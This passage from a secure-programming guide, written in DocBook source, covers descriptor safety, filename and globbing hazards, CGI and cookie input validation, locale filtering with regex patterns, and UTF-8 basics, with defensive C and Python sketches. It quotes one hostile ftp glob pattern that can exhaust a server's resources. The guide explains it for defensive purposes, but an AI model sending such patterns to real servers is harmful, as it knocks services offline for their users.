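The sketch below uses fcntl(2) to test whether each descriptor is open and
opens /dev/null in its place if it is not; the function name
ensure_standard_fds_open() is an assumption for this example.
It relies on open(2) returning the lowest unused descriptor, which is why
the descriptors are handled in ascending order.
</para>

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * Make sure descriptors 0, 1, and 2 are open, attaching /dev/null to
 * any that the invoker closed.  Returns 0 on success, -1 on failure.
 */
int ensure_standard_fds_open(void)
{
    int fd;

    for (fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) == -1) {
            int new_fd;

            if (errno != EBADF)
                return -1;          /* unexpected error */
            /* fd is closed; lower descriptors are known to be open,
               so a successful open() must return exactly fd. */
            new_fd = open("/dev/null", O_RDWR);
            if (new_fd != fd) {
                if (new_fd >= 0)
                    close(new_fd);
                return -1;
            }
        }
    }
    return 0;
}
```

<para>
A setuid/setgid program would call this before opening any other file and
exit if it fails, so that a later open can never land on descriptor 0, 1,
or 2 by accident.
</para>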
|
||
</sect1>
|
||
|
||
<sect1 id="file-names">
|
||
<title>File Names</title>
|
||
<para>
|
||
The names of files can, in certain circumstances, cause serious problems.
|
||
This is especially a problem for secure programs that run on computers
|
||
with local untrusted users, but this isn't limited to that circumstance.
|
||
Remote users may be able to trick a program into creating undesirable
|
||
filenames (programs should prevent this, but not all do), or remote
|
||
users may have partially penetrated a system and try using this trick
|
||
to penetrate the rest of the system.
|
||
</para>
|
||
<para>
|
||
Usually you will want to not include ``..''
|
||
(higher directory) as a legal value from an untrusted user, though
|
||
that depends on the circumstances.
|
||
You might also want to list only the characters you will permit, and
|
||
forbid any filenames that don't match the list.
|
||
It's best to prohibit any change in directory, e.g., by not
|
||
including ``/'' in the set of legal characters, if you're taking data
|
||
from an external user and transforming it into a filename.
|
||
</para>
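<para>
As one possible reading of this advice, the sketch below accepts a single
filename component only if it is built from a short list of permitted
characters.
The function name is_safe_filename(), the permitted set, and the
255-character limit are assumptions for this example and are stricter than
many applications need.
</para>

```c
#include <stddef.h>
#include <string.h>

/*
 * Return 1 if name is acceptable as a single filename component
 * taken from an untrusted user; return 0 otherwise.
 */
int is_safe_filename(const char *name)
{
    static const char legal[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz"
        "0123456789._-";
    size_t len;

    if (name == NULL || name[0] == '\0')
        return 0;
    /* A leading '.' excludes ".", "..", and hidden files;
       a leading '-' could be mistaken for an option. */
    if (name[0] == '.' || name[0] == '-')
        return 0;
    for (len = 0; name[len] != '\0'; len++) {
        if (len >= 255)
            return 0;               /* too long */
        /* '/' is not in the legal set, so no directory change is possible. */
        if (strchr(legal, name[len]) == NULL)
            return 0;
    }
    return 1;
}
```

<para>
Because the globbing characters, whitespace, and control characters are
also absent from the permitted set, names that pass this check are safe
to hand to most other programs without further escaping.
</para>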
|
||
|
||
<para>
|
||
Often you shouldn't support ``globbing'', that is,
|
||
expanding filenames using ``*'', ``?'', ``['' (matching ``]''),
|
||
and possibly ``{'' (matching ``}'').
|
||
For example, the command ``ls *.png'' does a glob on ``*.png'' to list
|
||
all PNG files.
|
||
The C fopen(3) function (for example) doesn't do globbing, but the command
|
||
shells perform globbing by default, and in C you can request globbing
|
||
using (for example) glob(3).
|
||
If you don't need globbing, just use the calls that don't do it where
|
||
possible (e.g., fopen(3)) and/or disable globbing
|
||
(e.g., escape the globbing characters in a shell).
|
||
Be especially careful if you want to permit globbing.
|
||
Globbing can be useful, but complex globs can take a great deal of computing
|
||
time.
|
||
For example, on some ftp servers, performing a few of these requests can
|
||
easily cause a denial-of-service of the entire machine:
|
||
<programlisting>
|
||
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
|
||
</programlisting>
|
||
<!-- http://lwn.net/2001/0322/a/ftpd-dos.php3 -->
|
||
Trying to allow globbing, yet limit globbing patterns, is probably futile.
|
||
Instead, make sure that any such programs run as a separate process and
|
||
use process limits to limit the amount of CPU and other resources
|
||
they can consume.
|
||
See <xref linkend="minimize-resources"> for more information on this
|
||
approach, and see <xref linkend="quotas"> for more information
|
||
on how to set these limits.
|
||
</para>
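<para>
As a rough sketch of the ``separate process with limits'' approach, the
following Python fragment runs a command in a child process whose CPU time
is capped using setrlimit(2).
The function name run_with_cpu_limit and the default limit are assumptions
made for this example; it relies on the Unix-only resource module, and a real
service would probably also limit memory, open files, and elapsed time.
</para>

```python
import resource
import subprocess


def run_with_cpu_limit(argv, cpu_seconds=1):
    """Run argv in a child process limited to roughly cpu_seconds of CPU."""

    def limit_child():
        # Runs in the child after fork() and before exec().
        _, hard = resource.getrlimit(resource.RLIMIT_CPU)
        new_hard = cpu_seconds + 1
        if hard != resource.RLIM_INFINITY:
            new_hard = min(new_hard, hard)  # an unprivileged process cannot raise it
        soft = min(cpu_seconds, new_hard)
        resource.setrlimit(resource.RLIMIT_CPU, (soft, new_hard))

    # The wall-clock timeout is a second safety net for children that sleep
    # instead of burning CPU.
    completed = subprocess.run(argv, preexec_fn=limit_child, timeout=60)
    # A negative return code means the child was killed by a signal
    # (SIGXCPU when the soft CPU limit is exceeded).
    return completed.returncode
```

<para>
The limit is applied in the child only, so the parent server keeps its own
limits and can simply report a failure when the child is killed.
</para>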
|
||
|
||
<para>
|
||
Unix-like systems generally forbid including the NUL character in a filename
|
||
(since this marks the end of the name) and the '/' character
|
||
(since this is the directory separator).
|
||
However, they often permit anything else, which is a problem;
|
||
it is easy to write programs that can be subverted by cleverly-created
|
||
filenames.
|
||
</para>
|
||
<para>
|
||
Filenames that can especially cause problems include:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Filenames with leading dashes (-).
|
||
If passed to other programs, this may cause the other programs to
|
||
misinterpret the name as option settings.
|
||
Ideally, Unix-like systems shouldn't allow these filenames;
|
||
they aren't needed and create many unnecessary security problems.
|
||
Unfortunately, developers currently have to deal with them.
|
||
Thus, whenever calling another program with a filename, insert
|
||
``--'' before the filename parameters (to stop option processing, if
|
||
the program supports this common request) or modify the filename
|
||
(e.g., insert ``./'' in front of the filename to keep the dash from
|
||
being the lead character).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Filenames with control characters.
|
||
This especially includes newlines and carriage returns (which are
often mistaken for argument separators inside shell scripts, or can
|
||
split log entries into multiple entries) and the
|
||
ESCAPE character (which can interfere with terminal emulators, causing
|
||
them to perform undesired actions outside the user's control).
|
||
Ideally, Unix-like systems shouldn't allow these filenames either;
|
||
they aren't needed and create many unnecessary security problems.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Filenames with spaces; a shell can sometimes split these into
multiple arguments, with the extra arguments causing problems.
|
||
Since other operating systems allow spaces in filenames (including
|
||
Windows and MacOS), for interoperability's sake this will probably
|
||
always be permitted.
|
||
Please be careful in dealing with them, e.g., in the shell use
|
||
double-quotes around all filename parameters whenever calling another
|
||
program.
|
||
You might want to forbid leading and trailing spaces at least; these
|
||
aren't as visible as when they occur in other places, and can confuse
|
||
human users.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Invalid character encoding.
|
||
For example, a program may believe that the filename is UTF-8 encoded,
|
||
but it may have an invalidly long UTF-8 encoding.
|
||
See <xref linkend="character-encoding-utf8"> for more information.
|
||
I'd like to see agreement on the character encoding used for filenames
|
||
(e.g., UTF-8), and then have the operating system enforce the encoding
|
||
(so that only legal encodings are allowed), but that hasn't happened
|
||
at this time.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Any other character special to internal data formats, such as ``<'',
|
||
``;'', quote characters, backslash, and so on.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
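<para>
The defensive measures in the list above can be sketched in Python as follows.
The helper names (has_control_characters, as_safe_argument, build_argv) are
hypothetical, and the sketch assumes the called program honors ``--'' as the
end of its options.
</para>

```python
def has_control_characters(name: str) -> bool:
    """True if name contains an ASCII control character (including DEL)."""
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name)


def as_safe_argument(name: str) -> str:
    """Return name in a form that cannot be mistaken for an option."""
    if has_control_characters(name):
        raise ValueError("control character in filename")
    # A leading "./" keeps a dash from being the first character.
    return "./" + name if name.startswith("-") else name


def build_argv(program: str, names: list) -> list:
    """Build an argument vector: program, "--", then the protected names."""
    return [program, "--"] + [as_safe_argument(n) for n in names]
```

<para>
Passing the resulting list to an interface that takes an argument vector
(for example, Python's subprocess.run() without shell=True) means no shell
ever re-parses the names, so spaces, ``;'', and quote characters stay inside
a single argument.
</para>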
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="file-contents">
|
||
<title>File Contents</title>
|
||
|
||
<para>
|
||
If a program takes directions from a file, it must not trust that file
|
||
specially unless only a trusted user can control its contents.
|
||
Usually this means that an untrusted user must not be able to modify the file,
|
||
its directory, or any of its ancestor directories.
|
||
Otherwise, the file must be treated as suspect.
|
||
</para>
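<para>
One way to approximate the check described above is to walk from the file up
to the root directory and confirm that every component is owned by a trusted
user and is not writable by anyone else.
The Python sketch below is illustrative only: the function name
only_trusted_can_modify is hypothetical, treating all group-writable entries
as untrusted is a deliberately conservative assumption, and the check is
subject to race conditions if the file system changes between the check
and the use of the file.
</para>

```python
import os
import stat


def only_trusted_can_modify(path, trusted_uids=(0,)):
    """True if path and all its ancestors are writable only by trusted users."""
    trusted = set(trusted_uids) | {os.geteuid()}
    current = os.path.realpath(path)  # resolve symbolic links first
    while True:
        info = os.stat(current)
        if info.st_uid not in trusted:
            return False
        # Conservative assumption: any group or world write bit is suspect.
        if info.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return False
        parent = os.path.dirname(current)
        if parent == current:  # reached the root directory
            return True
        current = parent
```

<para>
A file for which this returns false should be handled like any other
untrusted input.
</para>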
|
||
|
||
<para>
|
||
If the directions in the file are supposed to be from an untrusted user,
|
||
then make sure that the inputs from the file are protected as described
|
||
throughout this book.
|
||
In particular, check that values match the set of legal values, and that
|
||
buffers are not overflowed.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="web-apps">
|
||
<title>Web-Based Application Inputs (Especially CGI Scripts)</title>
|
||
|
||
<para>
|
||
Web-based applications (such as CGI scripts) run on some trusted
|
||
server and must get their
|
||
input data somehow through the web.
|
||
Since the input data generally come from untrusted users,
|
||
this input data must be validated.
|
||
Indeed, this information may have actually come from an untrusted third
|
||
party; see
|
||
<xref linkend="cross-site-malicious-content"> for more information.
|
||
For example, CGI scripts
|
||
are passed this information
|
||
through a standard set of environment variables and through standard input.
|
||
The rest of this text will specifically discuss CGI, because it's
|
||
the most common technique for implementing dynamic web content, but
|
||
the general issues are the same for most other dynamic web content techniques.
|
||
</para>
|
||
|
||
<para>
|
||
One additional complication is that many CGI inputs are provided in
|
||
so-called ``URL-encoded'' format, that is, some values are written in the
|
||
format %HH where HH is the hexadecimal code for that byte.
|
||
You or your CGI library must handle these inputs correctly by
|
||
URL-decoding the input and then checking
|
||
if the resulting byte value is acceptable.
|
||
You must correctly handle all values, including problematic
|
||
values such as %00 (NUL) and %0A (newline).
|
||
Don't decode inputs more than once, or input such as ``%2500''
|
||
will be mishandled (the %25 would be translated to ``%'', and the resulting
|
||
``%00'' would be erroneously translated to the NUL character).
|
||
</para>
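<para>
The ``decode once, then check'' rule can be illustrated with Python's
standard urllib.parse module.
The function name decode_form_value and the choice to reject every control
byte are assumptions for this sketch; note also that it handles only the %HH
notation, not the ``+'' convention for spaces used in form submissions.
</para>

```python
from urllib.parse import unquote_to_bytes


def decode_form_value(raw: str) -> str:
    """URL-decode raw exactly once, then validate the resulting bytes."""
    data = unquote_to_bytes(raw)  # one decoding pass only
    # Check after decoding, so %00 and %0A are seen as NUL and newline.
    if any(b < 0x20 or b == 0x7F for b in data):
        raise ValueError("control byte in input")
    return data.decode("utf-8")  # strict decoding rejects illegal UTF-8
```

<para>
With a single pass, ``%2500'' decodes to the harmless three-character text
``%00''; only a second, erroneous pass would turn it into a NUL byte.
</para>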
|
||
|
||
<para>
|
||
CGI scripts are commonly attacked by including special characters in their
|
||
inputs; see the comments above.
|
||
</para>
|
||
|
||
<para>
|
||
Another form of data available to web-based applications is ``cookies.''
|
||
Again, users can provide arbitrary cookie values, so they cannot
|
||
be trusted unless special precautions are taken.
|
||
Also, cookies can be used to track users, potentially invading user privacy.
|
||
As a result, many users disable cookies, so if possible your web application
|
||
should be designed so that it does not require the use of cookies
|
||
(but see my later discussion for when you <emphasis>must</emphasis> authenticate
|
||
individual users).
|
||
I encourage you to avoid or limit the use of persistent cookies
|
||
(cookies that last beyond a current session), because they are easily abused.
|
||
Indeed, U.S. agencies are currently forbidden to use persistent cookies
|
||
except in special circumstances, because of the concern about
|
||
invading user privacy; see the
|
||
<ulink url="http://cio.gov/files/lewfinal062200.pdf">OMB guidance
|
||
in memorandum M-00-13 (June 22, 2000)</ulink>.
|
||
<!-- http://cio.gov/files/OMBCookies2.pdf
|
||
http://www.gao.gov/new.items/d01147r.pdf -->
|
||
Note that to use cookies, some browsers may insist that you
|
||
have a privacy profile (named p3p.xml on the root directory of the server).
|
||
</para>
|
||
|
||
<para>
|
||
Some HTML forms include client-side input checking
|
||
to prevent some illegal values; these are
|
||
typically implemented using Javascript/ECMAscript or Java.
|
||
This checking can be helpful for the user, since it can happen ``immediately''
|
||
without requiring any network access.
|
||
However, this kind of input checking is useless for security, because
|
||
attackers can send such ``illegal'' values directly to the web server
|
||
without going through the checks.
|
||
It's not even hard to subvert this; you don't have to write
|
||
a program to send arbitrary data to a web application.
|
||
In general, servers must perform all their own input checking
|
||
(of form data, cookies, and so on) because
|
||
they cannot trust clients to do this securely.
|
||
In short, clients are generally not ``trustworthy channels''.
|
||
See <xref linkend="trustworthy-channels">
|
||
for more information on trustworthy channels.
|
||
</para>
|
||
|
||
<para>
|
||
A brief discussion on input validation for those using Microsoft's
|
||
Active Server Pages (ASP) is available from
|
||
Jerry Connolly at
|
||
<ulink url="http://heap.nologin.net/aspsec.html">http://heap.nologin.net/aspsec.html</ulink>.
|
||
<!-- ???
|
||
Jerry Connolly, jerry.connolly@EIRCOM.NET,
|
||
has guidelines for secure ASP pages - mentioned on SECPROG, 1 May 2001:
|
||
"I have written a small piece on the subject of input validation at:"
|
||
http://heap.nologin.net/aspsec.html
|
||
-->
|
||
</para>
|
||
|
||
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="other-inputs">
|
||
<title>Other Inputs</title>
|
||
|
||
<para>
|
||
Programs must ensure that all inputs are controlled; this is particularly
|
||
difficult for setuid/setgid programs because they have so many such inputs.
|
||
Other inputs programs must consider include the current directory,
|
||
signals, memory maps (mmaps), System V IPC, pending timers,
|
||
resource limits, the scheduling priority, and the umask (which determines
|
||
the default permissions of newly-created files).
|
||
Consider explicitly changing directories (using chdir(2)) to an appropriately
|
||
fully named directory at program startup.
|
||
<!--
|
||
From Bugtraq:
|
||
|
||
Re: trusting user-supplied data (was Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio)
|
||
From: wietse@porcupine.org (Wietse Venema)
|
||
Date: Wed, 24 Apr 2002 14:17:30 -0400 (EDT)
|
||
To: bugtraq@securityfocus.com
|
||
|
||
It is interesting to see that old problems with set-uid commands
|
||
keep coming back. Allow me to speed up the discussion a bit by
|
||
enumerating a few other channels for attack on set-uid commands.
|
||
|
||
A quick perusal of /usr/include/sys/proc.h reveals a large number
|
||
of "inputs" that a child process may inherit from a potentially
|
||
untrusted parent process.
|
||
|
||
The list includes, but is not limited to:
|
||
|
||
command-line array
|
||
environment array
|
||
open files
|
||
current directory
|
||
blocked/enabled signals
|
||
pending timers
|
||
resource limits
|
||
scheduling priority
|
||
All these sources of data can be, and have been, involved in attacks
|
||
on set-uid or set-gid commands (although I do not remember specific
|
||
details of pending timer attacks).
|
||
|
||
In addition to these "inheritance" attacks which are specific to
|
||
set-uid and set-gid commands, set-uid and set-gid commands can be
|
||
exposed to attacks via the /proc interface, and can be exposed to
|
||
ordinary data-driven attacks by feeding them nasty inputs.
|
||
|
||
Thus, set-uid and set-gid commands are exposed to a lot more attack
|
||
types than your average network service. The reason that network
|
||
attacks get more attention is simply that are more opportunities
|
||
to exploit them.
|
||
|
||
Wietse
|
||
|
||
-->
|
||
</para>
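<para>
A minimal sketch of resetting two of these inherited inputs at startup is
shown below, using Python's os module, which wraps chdir(2) and umask(2).
The function name enter_known_state and the default values (the root
directory and a umask of 077) are assumptions for illustration; a real
program would choose values suited to its purpose and would also deal with
signals, resource limits, and the other inputs listed above.
</para>

```python
import os


def enter_known_state(workdir: str = "/", mask: int = 0o077) -> None:
    """Replace the inherited current directory and umask with known values."""
    os.chdir(workdir)  # fully named directory, not something inherited
    os.umask(mask)     # new files are created without group/other access
```

<para>
Calling such a routine before any file is opened or created means the
caller's current directory and umask can no longer influence the program.
</para>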
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="locale">
|
||
<title>Human Language (Locale) Selection</title>
|
||
|
||
<para>
|
||
As more people have computers and the Internet available to them, there
|
||
has been increasing pressure for programs
|
||
to support multiple human languages and cultures.
|
||
This combination of language and other cultural factors is usually called
|
||
a ``locale''.
|
||
The process of modifying a program so it can support multiple locales
|
||
is called ``internationalization'' (i18n), and the process of providing
|
||
the information for a particular locale to a program is called
|
||
``localization'' (l10n).
|
||
</para>
|
||
|
||
<para>
|
||
Overall, internationalization
|
||
is a good thing, but this process provides another opportunity
|
||
for a security exploit.
|
||
Since a potentially untrusted user provides information on the desired
|
||
locale, locale selection becomes another input that,
|
||
if not properly protected, can be exploited.
|
||
</para>
|
||
|
||
<sect2 id="how-locales-selected">
|
||
<title>How Locales are Selected</title>
|
||
|
||
<para>
|
||
In locally-run programs (including setuid/setgid programs),
|
||
locale information is provided by an environment
|
||
variable.
|
||
Thus, like all other environment variables, these values
|
||
must be extracted and checked against valid patterns before use.
|
||
</para>
|
||
|
||
<para>
|
||
For web applications, this information can be obtained from the web
|
||
browser (via the Accept-Language request header).
|
||
However, since not all web browsers properly pass this information
|
||
(and not all users configure their browsers properly),
|
||
this is used less often than you might think.
|
||
Often, the language requested in a web browser
|
||
is simply passed in as a form value.
|
||
Again, these values must be checked for validity before use, as with
|
||
any other form value.
|
||
</para>
|
||
|
||
<para>
|
||
In either case, locale information is
|
||
really just a special case of input discussed in the previous sections.
|
||
However, because this input is so rarely considered,
|
||
I'm discussing it separately.
|
||
In particular,
|
||
when combined with format strings (discussed later), user-controlled
|
||
strings can permit attackers to force other programs to run
|
||
arbitrary instructions,
|
||
corrupt data, and do other unfortunate actions.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="locale-support-mechanisms">
|
||
<title>Locale Support Mechanisms</title>
|
||
|
||
<para>
|
||
There are two major library interfaces for supporting locale-selected
|
||
messages on Unix-like systems,
|
||
one called ``catgets'' and the other called ``gettext''.
|
||
In the catgets approach, every string is assigned a unique number, which
|
||
is used as an index into a table of messages.
|
||
In contrast,
|
||
in the gettext approach, a string (usually in English) is used to
|
||
look up a table that translates the original string.
|
||
catgets(3) is an accepted standard
|
||
(via the X/Open Portability Guide, Volume 3 and
|
||
Single Unix Specification),
|
||
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/catopen.html -->
|
||
so it's possible your program uses it.
|
||
The ``gettext'' interface is not an official standard,
|
||
(though it was originally a UniForum proposal), but I believe it's the
|
||
more widely used interface
|
||
(it's used by Sun and essentially all GNU programs).
|
||
</para>
|
||
|
||
<para>
|
||
In theory, catgets should be slightly faster, but this is at best
|
||
marginal on today's machines, and the bookkeeping effort to keep
|
||
unique identifiers valid in catgets() makes the gettext() interface
|
||
much easier to use.
|
||
I'd suggest using gettext(), just because it's easier to use.
|
||
However, don't take my word for it; see GNU's documentation on gettext
|
||
(info:gettext#catgets) for a longer and more descriptive comparison.
|
||
</para>
|
||
|
||
<para>
|
||
The catgets(3) call (and its associated catopen(3) call)
|
||
in particular is vulnerable
|
||
to security problems, because the environment variable NLSPATH can be
|
||
used to control the filenames used to acquire internationalized messages.
|
||
The GNU C library ignores NLSPATH for setuid/setgid programs, which helps,
|
||
but that doesn't protect programs running on other implementations, nor
|
||
other programs (like CGI scripts) which don't ``appear'' to
|
||
require such protection.
|
||
</para>
|
||
|
||
<para>
|
||
The widely-used ``gettext'' interface is at least not
|
||
vulnerable to a malicious NLSPATH setting to my knowledge.
|
||
However, it appears likely to me that malicious settings of
|
||
LC_ALL or LC_MESSAGES could cause problems.
|
||
Also, if you use gettext's bindtextdomain() routine in its file cat-compat.c,
|
||
that does depend on NLSPATH.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="locale-legal-values">
|
||
<title>Legal Values</title>
|
||
|
||
<para>
|
||
For the moment, if you must permit untrusted users to set information on
|
||
their desired locales, make sure the provided internationalization information
|
||
meets a narrow filter that only permits legitimate locale names.
|
||
For user programs (especially setuid/setgid programs), these values
|
||
will come in via NLSPATH, LANGUAGE, LANG, the old LINGUAS, LC_ALL, and
|
||
the other LC_* values (especially LC_MESSAGES, but also including
|
||
LC_COLLATE, LC_CTYPE, LC_MONETARY, LC_NUMERIC, and LC_TIME).
|
||
For web applications, this user-requested set of language information
|
||
would be done via the Accept-Language request header or a form value
|
||
(the application should indicate the actual language setting of the
|
||
data being returned via the Content-Language header).
|
||
You can check this value as part of your environment variable filtering if
|
||
your users can set your environment variables (i.e., setuid/setgid
|
||
programs) or as part of your input filtering (e.g., for CGI scripts).
|
||
The GNU C library "glibc" doesn't accept some values of LANG for
|
||
setuid/setgid programs (in particular anything with "/"),
|
||
but errors have been found in that filtering
|
||
(e.g., Red Hat released an update to fix this error in glibc
|
||
on September 1, 2000).
|
||
This kind of filtering isn't required by any standard, so you're
|
||
safer doing this filtering yourself.
|
||
I have not found any guidance on filtering language settings,
|
||
so here are my suggestions based on my own research into the issue.
|
||
</para>
|
||
|
||
<para>
|
||
First, a few words about the legal values of these settings.
|
||
Language settings are generally set using the standard tags defined
|
||
in IETF RFC 1766 (which uses two-letter language codes as its basic tag,
|
||
followed by an optional subtag separated by a dash; I've found that
|
||
environment variable settings use the underscore instead).
|
||
However, some find this insufficiently flexible, so three-letter language
|
||
codes may soon be used as well.
|
||
Also, there are two major not-quite compatible extended formats, the
|
||
X/Open Format and the CEN Format (European Community Standard);
|
||
you'd like to permit both.
|
||
Typical values include
|
||
``C'' (the C locale), ``EN'' (English),
|
||
and ``FR_fr'' (French using the territory of France's conventions).
|
||
Also, so many people use nonstandard names that programs have had to develop
|
||
``alias'' systems to cope with nonstandard names
|
||
(for GNU gettext, see /usr/share/locale/locale.alias, and for X11, see
|
||
/usr/lib/X11/locale/locale.alias; you might need "aliases" instead of "alias");
|
||
they should usually be permitted as well.
|
||
Libraries like gettext() have to accept all these variants and find an
|
||
appropriate value, where possible.
|
||
One source of further information is FSF [1999];
|
||
another source is the li18nux.org web site.
|
||
A filter should not permit characters that aren't needed,
|
||
in particular ``/'' (which might permit escaping out of the trusted
|
||
directories) and ``..'' (which might permit going up one directory).
|
||
Other dangerous characters in NLSPATH
|
||
include ``%'' (which indicates substitution) and ``:''
|
||
(which is the directory separator); the documentation I have for other
|
||
machines suggests that some implementations may use them for other values,
|
||
so it's safest to prohibit them.
|
||
<!-- The Sun man page for "man locale" is disturbingly ambiguous on whether
|
||
or not these characters affect values other than NLSPATH -->
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="locale-bottom-line">
|
||
<title>Bottom Line</title>
|
||
|
||
<para>
|
||
In short, I suggest
|
||
simply erasing or re-setting the NLSPATH, unless you have a trusted user
|
||
supplying the value.
|
||
For the Accept-Language header in HTTP (if you use it),
|
||
form values specifying the locale, and the environment variables
|
||
LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_* values listed
|
||
above,
|
||
filter the locales from untrusted users to permit null (empty) values or
|
||
to only permit values that match in total this regular expression
|
||
(note that I've recently added "="):
|
||
<programlisting width="61">
|
||
[A-Za-z][A-Za-z0-9_,+@\-\.=]*
|
||
</programlisting>
|
||
<!-- I permit plus. Standard locale name from li18nux.org
|
||
permits "=", so I added it; as of Feb 2002 they don't accept "+",
|
||
which is needed to support the CEN format. -->
|
||
I haven't found any legitimate locale which doesn't match this pattern,
|
||
but this pattern does appear to protect against locale attacks.
|
||
Of course, there's no guarantee that there are messages available
|
||
in the requested locale,
|
||
but in such a case these routines will fall back to the default
|
||
messages (usually in English), which at least is not a security problem.
|
||
<!-- I developed this pattern, after looking at the GLIBC specs in
|
||
http://www.netppl.fi/~pp/glibc21/libc_8.html and the aliases on
|
||
Red Hat 6.2 -->
|
||
</para>
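<para>
As an illustration of this advice, the Python sketch below drops NLSPATH and
discards any locale-related environment variable whose value is neither empty
nor a total match for the pattern above.
The function name filter_locale_env is hypothetical, and the decision to
delete (rather than reset) offending variables is an assumption of the
example.
</para>

```python
import re

# The permissive pattern given above; fullmatch() enforces a total match.
LOCALE_VALUE = re.compile(r"[A-Za-z][A-Za-z0-9_,+@\-\.=]*")
LOCALE_VARS = {"LANGUAGE", "LANG", "LINGUAS", "LC_ALL"}


def filter_locale_env(env: dict) -> dict:
    """Return a copy of env with NLSPATH and bad locale settings removed."""
    cleaned = {}
    for name, value in env.items():
        if name == "NLSPATH":
            continue  # erase it unless a trusted user supplied it
        if name in LOCALE_VARS or name.startswith("LC_"):
            if value != "" and LOCALE_VALUE.fullmatch(value) is None:
                continue  # not a plausible locale name; drop it
        cleaned[name] = value
    return cleaned
```

<para>
The filtered dictionary can then be used as the environment for the rest of
the program or for any child process it starts.
</para>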
|
||
|
||
<para>
|
||
If you wish to be really picky, and only permit patterns that match li18nux's
|
||
locale pattern, you can use this pattern instead:
|
||
<programlisting width="61">
|
||
^[A-Za-z]+(_[A-Za-z]+)?
|
||
(\.[A-Z]+(\-[A-Z0-9]+)*)?
|
||
(\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
|
||
(,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
|
||
</programlisting>
|
||
In both cases, these patterns use POSIX's extended (``modern'')
|
||
regular expression notation (see regex(3) and regex(7) on Unix-like systems).
|
||
</para>
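<para>
The stricter pattern can be tried out in the same way.
In this Python sketch the four lines of the pattern above are simply
concatenated; the function name is_strict_locale is hypothetical.
Python's re module is not the POSIX regex(3) library, but this pattern uses
only constructs that both interpret the same way.
</para>

```python
import re

# The four lines of the strict pattern above, joined into one expression.
STRICT_LOCALE = re.compile(
    r"^[A-Za-z]+(_[A-Za-z]+)?"
    r"(\.[A-Z]+(\-[A-Z0-9]+)*)?"
    r"(\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)"
    r"(,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$"
)


def is_strict_locale(value: str) -> bool:
    """True if value matches the strict locale pattern in its entirety."""
    return STRICT_LOCALE.fullmatch(value) is not None
```

<para>
Note how picky this pattern is: it requires an uppercase codeset and a
``name=value'' form for modifiers, so some names in common use
(such as ``fr_FR@euro'') are rejected.
</para>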
|
||
|
||
<!-- See John Levon's Bugtraq post on July 26, 2000 re internationalization
|
||
and format strings.
|
||
-->
|
||
|
||
<para>
|
||
Of course, languages cannot be supported without a
|
||
standard way to represent their written symbols, which brings
|
||
us to the issue of character encoding.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="character-encoding">
|
||
<title>Character Encoding</title>
|
||
|
||
<sect2 id="character-encoding-intro">
|
||
<title>Introduction to Character Encoding</title>
|
||
|
||
<para>
|
||
For many years Americans have exchanged text using the ASCII character set;
|
||
since essentially all U.S. systems support ASCII,
|
||
this permits easy exchange of English text.
|
||
Unfortunately, ASCII is completely inadequate in handling the characters
|
||
of nearly all other languages.
|
||
For many years different countries have adopted different techniques for
|
||
exchanging text in different languages, making it difficult to exchange
|
||
data in an increasingly interconnected world.
|
||
</para>
|
||
|
||
<para>
|
||
More recently, ISO has developed ISO 10646,
|
||
the ``Universal Multiple-Octet Coded Character Set'' (UCS).
|
||
UCS is a coded character set which
|
||
defines a single 31-bit value for each of all of the world's characters.
|
||
The first 65536 characters of the UCS (which thus fit into 16 bits)
|
||
are termed the ``Basic Multilingual Plane'' (BMP),
|
||
and the BMP is intended to cover nearly all of today's spoken languages.
|
||
The Unicode Consortium develops the Unicode standard, which concentrates on
|
||
the UCS and adds some additional conventions to aid interoperability.
|
||
Historically, Unicode and ISO 10646 were developed by competing groups,
|
||
but thankfully they realized that they needed to work together and they now
|
||
coordinate with each other.
|
||
</para>
|
||
|
||
<para>
|
||
If you're writing new software that handles internationalized characters,
|
||
you should be using ISO 10646/Unicode as your basis for handling
|
||
international characters.
|
||
However, you may need to process older documents in various older
|
||
(language-specific) character sets, in which case, you need to ensure that
|
||
an untrusted user cannot control the setting of another document's
|
||
character set (since this would significantly affect the document's
|
||
interpretation).
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="character-encoding-utf8">
|
||
<title>Introduction to UTF-8</title>
|
||
|
||
<para>
|
||
Most software is not designed to handle 16 bit or 32 bit characters,
yet a universal character set requires more than 8 bits per character.
|
||
Therefore, a special format called ``UTF-8'' was developed to encode these
|
||
potentially international
|
||
characters in a format more easily handled by existing programs and libraries.
|
||
UTF-8 is defined, among other places, in IETF RFC 2279, so it's a
|
||
well-defined standard that can be freely read and used.
|
||
UTF-8 is a variable-width encoding; characters numbered 0 to 0x7f (127)
|
||
encode to themselves as a single byte,
|
||
while characters with larger values are encoded into 2 to 6 bytes of
|
||
information (depending on their value).
|
||
The encoding has been specially designed to have the following
|
||
nice properties (this information is from the RFC and Linux utf-8 man page):
|
||
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
The classical US ASCII characters (0 to 0x7f) encode as themselves,
|
||
so files and strings which contain only 7-bit ASCII characters
|
||
